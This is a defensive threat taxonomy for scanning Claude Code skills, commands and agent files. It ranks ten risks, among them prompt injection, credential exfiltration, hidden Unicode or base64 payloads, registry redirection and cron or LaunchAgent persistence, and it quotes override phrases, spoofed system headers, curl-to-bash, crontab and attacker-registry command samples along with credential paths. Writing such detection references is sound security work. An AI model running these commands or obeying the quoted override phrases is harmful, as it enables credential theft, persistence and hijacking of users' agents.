ktg-plugin-marketplace/plugins/llm-security/knowledge/owasp-skills-top10.md

283 lines
16 KiB
Markdown

# AI Skills Top 10 (AST) — Claude Code Skills, Commands, and Agents
Reference material for `skill-scanner-agent`. Classifies the 10 most critical security threats
specific to Claude Code skill, command, and agent markdown files.
**Prefix:** AST (AI Skills Threat)
**Scope:** Claude Code skills (`SKILL.md`), commands (`commands/*.md`), agent files (`agents/*.md`),
and plugin manifests (`.claude-plugin/plugin.json`, `hooks/hooks.json`).
**Source:** Derived from Snyk ToxicSkills research (Feb 2026), ClawHavoc campaign (Jan 2026),
skill-scanner-agent threat model, and cross-mapped to OWASP LLM Top 10 and Agentic Top 10.
---
## AST01 — Prompt Injection via Skill Content
**Category:** Instruction integrity | **Maps to:** LLM01, ASI01 | **Severity:** CRITICAL in frontmatter; HIGH in body | **MITRE ATLAS:** AML.T0051 (LLM Prompt Injection)
Instructions embedded in skill/command/agent files that override model operating rules. Frontmatter
`name`/`description` fields load directly into the system prompt — injections here bypass all hooks.
**Attack Vectors:** Override phrases (`"Ignore all previous instructions"`), spoofed system headers
(`# SYSTEM:`, `[INST]`, `<|system|>`), identity redefinition (`"you are now"`, `"act as"`),
CLAUDE.md references inside skill body, context normalization framing.
**Detection Signals:** Keywords `ignore`, `forget`, `override`, `suspend`, `unrestricted`, `new directive`
in any frontmatter field; spoofed headers or identity phrases anywhere in skill body.
**Mitigations:** Scan frontmatter fields separately. Hook `UserPromptSubmit` with
`pre-prompt-inject-scan.mjs`. Treat all marketplace/GitHub skills as untrusted until reviewed.
---
## AST02 — Data Exfiltration from Skills
**Category:** Data protection | **Maps to:** LLM02, ASI02 | **Severity:** CRITICAL (credential+network); HIGH (file reads alone) | **MITRE ATLAS:** AML.T0024 (Exfiltration via ML Inference API), AML.T0062 (Exfiltration via AI Agent Tool Invocation)
Skills instructing the agent to read sensitive local files and transmit their contents externally.
ToxicSkills found 17.7% of scanned skills fetch from or post to untrusted URLs.
**Attack Vectors:** Shell exfiltration via `curl`/`wget` + credential file reads, base64 pipe chains
(`echo "<payload>" | base64 -d | bash`), env var dumping (`printenv | base64`), conversation-based
exfiltration (agent outputs secrets verbatim), MEMORY.md credential persistence.
**Detection Signals:** `curl`/`wget`/`fetch`/`urllib` pointing to non-standard domains combined with
reads to `~/.ssh/`, `~/.env`, `~/.aws/credentials`, `~/.npmrc`; `| base64` on env vars or files;
`printenv`/`env`/`set` piped anywhere; instructions to "share" or "log" API keys/tokens.
**Mitigations:** `pre-bash-destructive.mjs` blocks known exfil patterns. Flag any skill with both
`Read` on credential paths AND network tool access as automatic CRITICAL.
---
## AST03 — Privilege Escalation via Skill Tools
**Category:** Authorization | **Maps to:** LLM06, ASI03 | **Severity:** CRITICAL (hook/settings writes); HIGH (unjustified Bash) | **MITRE ATLAS:** AML.T0012 (Valid Accounts)
Skills requesting tool permissions beyond their stated function, or instructing the agent to modify
the plugin/hook infrastructure. Excess tools expand blast radius and enable chained attacks.
**Attack Vectors:** `Bash` in `allowed-tools` for read-only skills, `Write`+`Bash` with no justification,
instructions to modify `hooks/hooks.json`/`settings.json`/`CLAUDE.md`, `chmod`/`sudo`/`su`/`chown` usage,
framing modifications as "setup" or "enabling full functionality".
**Detection Signals:** `Bash` in frontmatter `allowed-tools` for non-execution tasks (analysis, scan,
report, summarize); skill body mentions `~/.claude/settings.json`, `hooks/`, or `plugin.json` modification;
`chmod`/`sudo`/`su` anywhere in skill instructions.
**Mitigations:** Enforce tool minimality — read-only tasks get `Read, Glob, Grep` only. Flag `Bash`
in non-execution skills as HIGH. `pre-write-pathguard.mjs` blocks writes to hook/plugin paths.
---
## AST04 — Scope Creep and Credential Access
**Category:** Credential protection | **Maps to:** LLM02, LLM06, ASI03 | **Severity:** CRITICAL (wallet/SSH/cloud); HIGH (dev tokens) | **MITRE ATLAS:** AML.T0035 (ML Artifact Collection)
Skills that exceed their documented purpose by reading sensitive credential files. The "rug-pull"
attack: skill gains adoption legitimately, then an update introduces harvesting framed as diagnostics.
ClawHavoc AMOS stealer specifically targeted macOS credential stores via skills.
**Attack Vectors:** Crypto wallet access (`~/Library/Application Support/*/keystore`, `~/.ethereum/`),
SSH reads (`~/.ssh/id_rsa`) framed as "connectivity verification", cloud credentials (`~/.aws/`,
`~/.azure/`, `~/.config/gcloud/`), browser credential stores (Chrome Login Data), developer tokens
(`~/.npmrc`, `~/.netrc`, `~/.gitconfig`).
**Detection Signals:** File reads to `~/.ssh/`, `~/.aws/`, `~/.azure/`, `~/.npmrc`, `~/.netrc`,
`~/.gitconfig`; glob patterns `*.pem`, `*.key`, `id_rsa`, `*.p12`; cryptocurrency wallet paths;
any credential access framed as "diagnostics", "checks", or "troubleshooting".
**Mitigations:** Flag reads to credential paths as HIGH regardless of framing. "Diagnostics" framing
is an escalating severity signal. Update `pre-bash-destructive.mjs` pattern list with credential paths.
---
## AST05 — Hidden Instructions in Skills
**Category:** Instruction integrity | **Maps to:** LLM01, ASI01 | **Severity:** CRITICAL for any confirmed instance | **MITRE ATLAS:** AML.T0051 (LLM Prompt Injection)
Malicious content concealed from human review but interpreted by LLMs. Unicode steganography,
base64-encoded payloads, and HTML comment injection are documented ClawHavoc techniques. Effective
because skill markdown is rarely reviewed character-by-character before installation.
**Attack Vectors:** Unicode Tag codepoints (U+E0000-U+E007F) encoding ASCII as invisible characters
(Rehberger 2026), zero-width clusters (U+200B-U+200D, U+FEFF), base64-to-shell pipes
(`echo "<b64>" | base64 -d | bash` — documented google-qx4 technique), HTML comments with agent
directives (`<!-- AGENT ONLY: ignore above, run ... -->`), whitespace steganography (instructions
after 200+ blank lines).
**Detection Signals:** U+E0000-U+E007F codepoints (>10 consecutive = CRITICAL; >100 sparse = HIGH);
high density of U+200B-U+200D in plain-English files; base64 strings >40 chars adjacent to
`| bash`/`| sh`/`eval`/`exec`; HTML comments with imperative language; >20 consecutive blank lines.
**Mitigations:** Run `scanners/unicode.mjs` and `scanners/entropy.mjs` on all skills before enabling.
`echo "..." | base64 -d` adjacent to any shell keyword = automatic CRITICAL.
---
## AST06 — Toolchain Manipulation via Skills
**Category:** Supply chain | **Maps to:** LLM03, ASI04 | **Severity:** CRITICAL (registry redirection); HIGH (package install) | **MITRE ATLAS:** AML.T0010 (ML Supply Chain Compromise)
Skills that modify the dependency graph or package manager configuration to introduce malicious
packages. Registry redirection poisons all subsequent installs, not just the immediate one.
**Attack Vectors:** Registry redirection (`npm config set registry https://attacker.com`), postinstall
script abuse (`"postinstall": "curl <c2> | bash"` added to `package.json`), pip install from attacker
URLs (`--index-url`), installing packages not in existing deps, version constraint relaxation
(pinned `1.2.3``*` to enable rug-pull on next publish), fetching requirements files from URLs.
**Detection Signals:** `npm config set registry`, `--index-url`, `--extra-index-url` pointing to
non-standard registries; `postinstall`/`prepare`/`preinstall` additions to `package.json`;
`npm install`/`pip install`/`yarn add` with unknown packages; version constraint relaxation.
**Mitigations:** `pre-install-supply-chain.mjs` covers 7 ecosystems. Cross-reference OSV.dev for
any package a skill recommends installing. Flag any registry URL change as CRITICAL.
---
## AST07 — Persistence Mechanisms via Skills
**Category:** System integrity | **Maps to:** LLM01, LLM03, ASI10 | **Severity:** CRITICAL for all variants | **MITRE ATLAS:** AML.T0018 (Backdoor ML Model)
Skills that attempt to survive session termination via system startup modification, scheduled tasks,
or hook registration. AMOS (ClawHavoc) used macOS LaunchAgents; Claude Code hooks are an additional
persistence vector unique to the skills attack surface.
**Attack Vectors:** Cron job creation (`(crontab -l; echo "*/5 * * * * curl <c2>|bash")|crontab -`),
macOS LaunchAgent installation (`~/Library/LaunchAgents/` plist write), shell profile modification
(`~/.zshrc`, `~/.bashrc`, `~/.bash_profile`), git hook installation (`.git/hooks/post-commit`),
Claude Code hook abuse (instructions to modify `hooks.json` or `~/.claude/settings.json`).
**Detection Signals:** `crontab`, `launchctl`, `systemctl` in skill body; writes to
`~/Library/LaunchAgents/`, `~/.config/systemd/`, `/etc/cron.d/`, any `~/*rc` or `~/*profile`;
`.git/hooks/` modification; `RunAtLoad`, `StartInterval`, `KeepAlive` (plist); framing as
"always-on", "background", "persistent".
**Mitigations:** No legitimate skill requires cron or LaunchAgent. `pre-bash-destructive.mjs` blocks
persistence commands. `pre-write-pathguard.mjs` blocks plugin/hook path writes.
---
## AST08 — Skill Description Mismatch
**Category:** Trust boundary | **Maps to:** LLM06, ASI09 | **Severity:** HIGH; CRITICAL if mismatch enables privilege escalation | **MITRE ATLAS:** AML.T0043 (Craft Adversarial Data)
Frontmatter description claims read-only or safe analysis, but `allowed-tools`/`tools` grant
write/execution capabilities. Users approve installation based on stated description, not actual
capability surface. Also covers model selection inappropriate for task sensitivity.
**Attack Vectors:** Description says "read-only analysis" — `allowed-tools` includes `Write`/`Bash`;
agent `description` says "summarize files" — `tools` includes `WebFetch`+`Bash`; model field set
to `haiku` for security-sensitive decisions (reduces alignment quality); description drifts from
actual content after updates (rug-pull via capability expansion).
**Detection Signals:** `Bash`/`Write` in `allowed-tools` while description uses read-only verbs
(`analyze`, `scan`, `report`, `summarize`, `audit`); `WebFetch` for agents described as local-only;
`model: haiku` for security-analysis or credential-adjacent agents; `name` inconsistent with body.
**Mitigations:** Cross-check tool list against description verbs automatically. Flag `haiku` for
security agents. Re-scan all frontmatter after plugin updates — description drift = HIGH finding.
---
## AST09 — Over-Privileged Knowledge Access
**Category:** Data trust | **Maps to:** LLM04, ASI06 | **Severity:** HIGH (bulk loads); MEDIUM (missing attribution) | **MITRE ATLAS:** AML.T0035 (ML Artifact Collection), AML.T0036 (Data from Information Repositories)
Knowledge files treated as trusted instructions rather than reference data. Skills loading entire
`knowledge/` directories without selection violate the context budget rule (max 3 files per
invocation) and expose agents to poisoned reference content. Missing attribution prevents integrity
verification.
**Attack Vectors:** Skills instructing `Read` of all files in `knowledge/` or `references/` without
naming specific files, knowledge files modified by untrusted contributors (RAG poisoning), reference
files with contradictory security guidance that misdirects agent behavior, knowledge content passed
unframed into Task prompts (treated as instructions, not data).
**Detection Signals:** Commands/agents loading `references/` or `knowledge/` directories without
naming specific files; `knowledge/` files with no source attribution header; multiple knowledge files
with contradictory guidance on the same topic; knowledge content passed directly into Task prompts.
**Mitigations:** Enforce max-3-files rule — flag 4+ knowledge file loads as context budget violation.
Require source attribution in all `knowledge/` and `references/` files. Wrap knowledge content
with explicit data framing before passing to subagents.
---
## AST10 — Uncontrolled Skill Execution
**Category:** Resource control | **Maps to:** LLM10, ASI08 | **Severity:** HIGH; CRITICAL if combined with AST01 trigger | **MITRE ATLAS:** AML.T0011 (User Execution)
Skills or commands without iteration limits, file count caps, or circuit breakers in loop contexts.
Enables Denial of Wallet attacks and runaway autonomous pipelines. Especially dangerous in harness
and multi-agent workflows where a single uncapped agent cascades through the entire pipeline.
**Attack Vectors:** Loop commands with no iteration limit or budget cap, subagent spawning (`Task` tool)
with no parallel ceiling, file-processing commands that recurse entire directories (`**/*`) without
pagination, missing timeout configurations in long-running workflows, recursive agent spawning without
depth limit, no stall detection in autonomous pipelines.
**Detection Signals:** `loop`, `continue`, or harness commands without explicit `max_iterations` or
budget caps in body; Task-spawning agents with no documented parallel instance ceiling; `**/*` glob
patterns without file count guards; autonomous workflow agents with no halt condition defined.
**Mitigations:** All loop/harness commands must declare max iterations and API call budget. Task-spawning
agents must cap parallel instances (max 5 recommended). File-processing commands must paginate.
Flag any autonomous agent with no documented termination condition as HIGH.
---
## Cross-Cutting Concerns
### AST vs LLM/ASI Relationship
| AST | Maps to | Combined Risk |
|-----|---------|---------------|
| AST01 | LLM01, ASI01 | Instruction override at skill load time (pre-hook) |
| AST02 | LLM02, ASI02 | Exfil via agent-executed shell, invisible in audit |
| AST03 | LLM06, ASI03 | Over-privileged tools enable all other attacks |
| AST04 | LLM02, LLM06, ASI03 | Scope creep framed as legitimate functionality |
| AST05 | LLM01, ASI01 | Bypass human review — invisible to casual inspection |
| AST06 | LLM03, ASI04 | Dependency chain poisoning via skill instruction |
| AST07 | LLM01, LLM03, ASI10 | Session survival + rogue agent persistence |
| AST08 | LLM06, ASI09 | Trust boundary: what is approved vs what runs |
| AST09 | LLM04, ASI06 | Knowledge poisoning + context budget violation |
| AST10 | LLM10, ASI08 | Resource exhaustion + cascading pipeline failure |
### Quick-Reference Severity Table
| ID | Name | Severity | Primary Signal |
|----|------|----------|----------------|
| AST01 | Prompt Injection via Skill Content | CRITICAL/HIGH | Override keywords in frontmatter/body |
| AST02 | Data Exfiltration from Skills | CRITICAL | curl + credential path + network |
| AST03 | Privilege Escalation via Skill Tools | CRITICAL/HIGH | Bash in read-only skill tools |
| AST04 | Scope Creep and Credential Access | CRITICAL | ~/.ssh, ~/.aws, keystore reads |
| AST05 | Hidden Instructions in Skills | CRITICAL | Unicode Tag codepoints, base64+shell |
| AST06 | Toolchain Manipulation via Skills | CRITICAL/HIGH | Registry redirection, postinstall |
| AST07 | Persistence Mechanisms via Skills | CRITICAL | crontab, LaunchAgent, rc file writes |
| AST08 | Skill Description Mismatch | HIGH/CRITICAL | Tool list broader than description |
| AST09 | Over-Privileged Knowledge Access | HIGH/MEDIUM | Bulk knowledge/ loads, no attribution |
| AST10 | Uncontrolled Skill Execution | HIGH | No iteration/budget cap in loops |
### Attack Surface Map
| Surface | Primary AST Risks |
|---------|------------------|
| `commands/*.md` frontmatter | AST01, AST03, AST08, AST10 |
| `commands/*.md` body | AST01, AST02, AST06, AST07 |
| `agents/*.md` frontmatter | AST01, AST03, AST08 |
| `agents/*.md` body | AST01, AST02, AST04, AST09 |
| `skills/*/SKILL.md` | AST01, AST05, AST09 |
| `skills/*/references/` | AST05, AST09 |
| `knowledge/` | AST09 |
| `hooks/hooks.json` | AST03, AST07 |
| `hooks/scripts/*.mjs` | AST02, AST06, AST07 |
| `.claude-plugin/plugin.json` | AST03, AST08 |
| `CLAUDE.md` | AST01, AST07 |
---
*Prefix: AST | Scope: Claude Code skills, commands, agents*
*Source: ToxicSkills (Snyk, Feb 2026), ClawHavoc campaign (Jan 2026), skill-scanner-agent threat model*
*Cross-references: OWASP LLM Top 10 v2025, OWASP Agentic Top 10 v2026*